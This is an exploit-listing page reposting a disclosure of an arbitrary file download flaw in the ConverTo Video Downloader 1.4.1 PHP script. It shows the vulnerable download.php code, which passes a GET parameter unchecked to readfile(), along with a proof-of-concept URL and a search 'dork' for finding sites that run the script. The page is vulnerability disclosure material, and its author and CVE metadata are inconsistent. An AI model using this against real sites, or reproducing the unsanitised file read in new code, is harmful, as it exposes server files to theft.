Advertisement






ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Vulnerability

CVE Category Price Severity
CVE-2019-19412 CWE-22 $1,000 High
Author Risk Exploitation Type Date
Mehmet Ince High Remote 2018-01-17
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02253 0.99763

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010171

Below is a copy:

ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Vulnerability
====================================================================================================================================
| # Title     : ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Vulnerability                                |
| # Author    : indoushka                                                                                                          |
| # email     : [email protected]                                                                                           |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Version   : 1.4.1                                                                                                              |
| # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966                                           |  
| # Dork      : http://vd.googglet.com/                                                                                            |
====================================================================================================================================


poc :

Aug 25, 2017  Update 1.4.1

download.php 

line 12 readfile ($file);  & line 5 $file = urldecode($_GET['f']);

<?php 
if(isset($_GET['f'])){

$siz = convertToBytes($_GET['sz']);
$file = urldecode($_GET['f']);
$rand = rand(0,5000);
header("Content-Description: File Transfer"); 
header("Content-Type: application/octet-stream"); 
header('Content-Length: ' . $siz);
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4"); 
 ob_clean(); flush();
readfile ($file); 

}


http://localhost/[PATH]/download.php?f= Ev!l

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum